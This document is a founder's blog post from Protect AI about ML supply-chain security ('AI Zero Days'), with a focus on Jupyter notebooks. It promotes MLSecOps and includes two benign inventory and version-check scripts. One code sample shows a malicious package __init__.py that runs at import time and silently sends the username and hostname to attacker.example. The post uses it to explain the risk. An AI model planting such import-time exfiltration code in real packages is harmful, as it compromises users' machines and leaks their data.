
AI Zero Days: Why we need MLSecOps, now.

Day 1… 

Customers have been the focus of my career in almost every role I have had. Prior to co-founding Protect AI, I had the honor of leading a team of some of the brightest and most talented customer-facing engineers in the AI and ML industry at Amazon Web Services. That tenure included a massive effort between customers (many of whom were competitors in their own industries) and suppliers (some of whom competed directly with AWS) to make MLOps an industry-standard practice for scaling AI workloads and accelerating ML development. As their systems grew in sophistication, complexity, and use, novel issues and challenges surfaced.

In the first days of Protect AI, some of our most advanced build partners shared their “unique AI security challenges.” Some discussed regulatory issues, all talked about ML pipeline oversight problems, and two mentioned the concept of purposeful model manipulation. Those conversations inspired my co-founders and me to survey the landscape of cybersecurity issues unique to AI/ML. Our research unearthed considerable opportunities for hackers, nation-states, and other threat actors to do serious harm by exploiting vulnerabilities in the ML software supply chain. We call these supply chain vulnerabilities “AI Zero Days.”

What’s an AI Zero Day (AIØD)?

The term “zero day” is common in cybersecurity and refers to a vulnerability in a system or device that has been disclosed but is not yet patched. (Correspondingly, an exploit that attacks a zero-day vulnerability is called a zero-day exploit.) The name reflects the fact that the vendor or developer has only just learned of the flaw, which means they have “zero days” to fix it. As a result, zero-day vulnerabilities pose a significant risk to software systems as cybercriminals race to exploit them while defenders race to patch them and close these holes. Zero days exist in every technology domain, from mobile operating systems to browsers to OS kernels. They exist in AI applications and ML pipelines, too.

AIØDs in ML Supply Chains

Typically, zero-day attacks are created by exploiting assets in an application’s or system’s software supply chain. Two notable examples outside ML are the SolarWinds attack on the US Government and the Log4j vulnerability, which left millions (if not billions) of devices open to hackers. Both continue to create problems across the tech landscape, and both represent exploits against software supply chains.

As we explored building our first set of products, we examined how existing cybersecurity best practices hold up against the ML supply chain and MLOps environments. It was readily apparent that even the most advanced ML companies don’t keep detailed inventories of every asset and element used in their ML code base. In speaking with hundreds of customers since our founding, we heard repeatedly that current scanning tools have blind spots because they aren’t yet adapted to the ML assets and tools used to build AI applications. This makes identifying a Log4j-like vulnerability in ML difficult, if not impossible, with traditional cybersecurity offerings.
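To make the inventory gap concrete, here is a minimal sketch of what a first pass at an ML asset inventory might look like. The extension list and helper name are illustrative assumptions, not a description of any product:

```python
from pathlib import Path

# Illustrative mapping of common ML artifact types; a real inventory would
# also need to cover framework-specific formats, datasets, and remote
# model registries.
ML_ARTIFACTS = {
    ".ipynb": "Jupyter notebook",
    ".pkl": "pickled object (executes code when loaded)",
    ".pt": "PyTorch checkpoint (pickle-based)",
    ".h5": "Keras/HDF5 model",
    ".onnx": "ONNX model",
}

def inventory_ml_assets(repo_root: str) -> list[tuple[str, str]]:
    """Walk a repository and list ML artifacts that generic scanners often miss."""
    found = []
    for path in Path(repo_root).rglob("*"):
        kind = ML_ARTIFACTS.get(path.suffix.lower())
        if kind:
            found.append((str(path), kind))
    return found

for path, kind in inventory_ml_assets("."):
    print(f"{kind:40s} {path}")
```

Even a simple listing like this surfaces pickle-based artifacts, which deserve special scrutiny because loading them executes arbitrary code.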

These gaps exist not because people doubt the need, but because current cybersecurity vendors lack context and expertise in ML. Similarly, many ML platform suppliers don’t yet consider their role in the security of ML systems, largely assuming that cybersecurity vendors will address it on their behalf. This has created a gap that Protect AI intends to fill.

One of our leading investors, cybersecurity pioneer Mark Kraynak, stated it well:

“ML is an entirely new class of applications and underlying infrastructure, just like mobile web, IoT, and Web3. Security for new application ecosystems follows the same arc: knowledge of vulnerabilities, followed by the ability to find them, then adding contextual understanding and prioritization, then finally automated remediation. Protect AI will enable this end-to-end arc for AI systems.”


MLSecOps for Notebooks: Issues in Plain Sight

When evaluating how we could immediately help make ML software supply chains more secure, we started where almost every ML journey does: with Jupyter Notebooks. This core component of the ML supply chain is ripe for exploits and attacks, both because of how pervasive Jupyter Notebooks are in ML code environments and because of how they are used to exchange and share work among data scientists. Most application developers now treat security risk and its mitigation as a natural part of their work, and hold the responsibility for secure code in high regard. But many cybersecurity and ML customers have told us that their data scientists and ML engineers do not yet have security at the forefront of their workflow. From an industry perspective, just look at the recent release of ChatGPT and the flood of adversarial prompt research that followed. Security does not appear to have been top of mind when this foundational model was released. And while ChatGPT is an advanced example of new AI cybersecurity risks, simple exploits in ML code can be easily created, and just as easily missed.

Consider Remote Code Execution (RCE) flaws. In a traditional web application, RCE usually requires finding specific entry points and abusing the application. In Jupyter, RCE can be as simple as getting a user to import a package. Jupyter environments often run with elevated compute and data access, so a compromised package could, for example, embed malicious code into every model trained on a particular host, or leak all inference data to an unknown location. A compromised package running in Jupyter is just one example of the security holes that exist in the ML supply chain today.
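To make that concrete, here is a deliberately defanged sketch of why importing a package is itself an execution boundary. The package name and endpoint are invented for illustration:

```python
# evil_package/__init__.py -- illustrative only. Python executes a package's
# __init__.py the moment it is imported, so "import evil_package" in a
# notebook is all it takes; no function ever needs to be called.
import getpass
import socket
import urllib.request

def _phone_home():
    # A real payload might exfiltrate credentials, training data, or model
    # weights; this sketch only sends a username/hostname marker.
    beacon = f"{getpass.getuser()}@{socket.gethostname()}".encode()
    try:
        urllib.request.urlopen(
            "https://attacker.example/collect", data=beacon, timeout=2
        )
    except OSError:
        pass  # fail silently so the notebook user notices nothing

_phone_home()  # runs at import time

```

Because the malicious call happens during import, nothing in the notebook’s visible code ever looks suspicious.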

Beyond Notebooks: Securing the ML Supply Chain

The start of MLSecOps in notebooks is just that: a start. Protect AI will be creating more industry-first and industry-leading security tools for ML, conducting novel exploit and threat research on AI systems, and providing community leadership to drive the industry’s transition from MLOps to MLSecOps. Recently, PyTorch and TensorFlow had new CVEs disclosed that could facilitate classic cyberattacks such as denial-of-service and buffer-overflow exploits. Considering how prevalent these two frameworks are in MLOps pipelines, it is easy to grasp the opportunity for attackers to hit a company in a new, unexpected realm: ML pipelines and AI systems.
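A modest first step toward managing that exposure is simply knowing which framework builds are deployed, so they can be mapped against published CVEs. A minimal sketch (the package list is illustrative; the advisory lookup itself belongs to a scanner such as pip-audit or an internal vulnerability feed):

```python
from importlib import metadata

# Print the installed versions of the frameworks most common in ML pipelines
# so they can be checked against CVE databases.
for dist in ("torch", "tensorflow"):
    try:
        print(f"{dist}=={metadata.version(dist)}")
    except metadata.PackageNotFoundError:
        print(f"{dist}: not installed")
```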

This is why we are building products to protect you against these new risks, with tools optimized for AI/ML practitioners while contextualizing the security needs familiar to cybersecurity professionals. Our company’s leadership has spent their careers in this space and knows the distinct needs and workflows of data scientists, ML engineers, and cybersecurity professionals. We are building tools that extend the core technology each role is already using, to accelerate adoption and improve the security posture of AI systems at each stage of the ML lifecycle.

We will complement these tools with the industry’s broadest and deepest research into unique ML supply chain threats and AIØDs, exposing much of our research to help the ethical hacking community understand how to make these systems more secure. Helping guide this effort are leading cybersecurity advisors and new ML-focused threat researchers who have joined the organization, with more to be announced.

Most importantly, we will not pursue these efforts alone. The primary differentiator in our approach to ML model and AI system security is collaboration: with individuals and companies, and among our peers, fellow travelers, and competitors alike. It’s humbling to see the outpouring of encouragement and excitement for our mission to build the standard for enabling MLSecOps across the AI industry. This is a classic BHAG (Big Hairy Audacious Goal) that will require a collective effort from companies large and small, with AI developers and cybersecurity practitioners and leaders from across the skills spectrum contributing to the rapidly evolving space of “ML cybersecurity” and MLSecOps. We are committed to leading this community.

I hope you will join us on this journey to move the industry forward on MLSecOps.

Sincerely,

D

#MLSecOps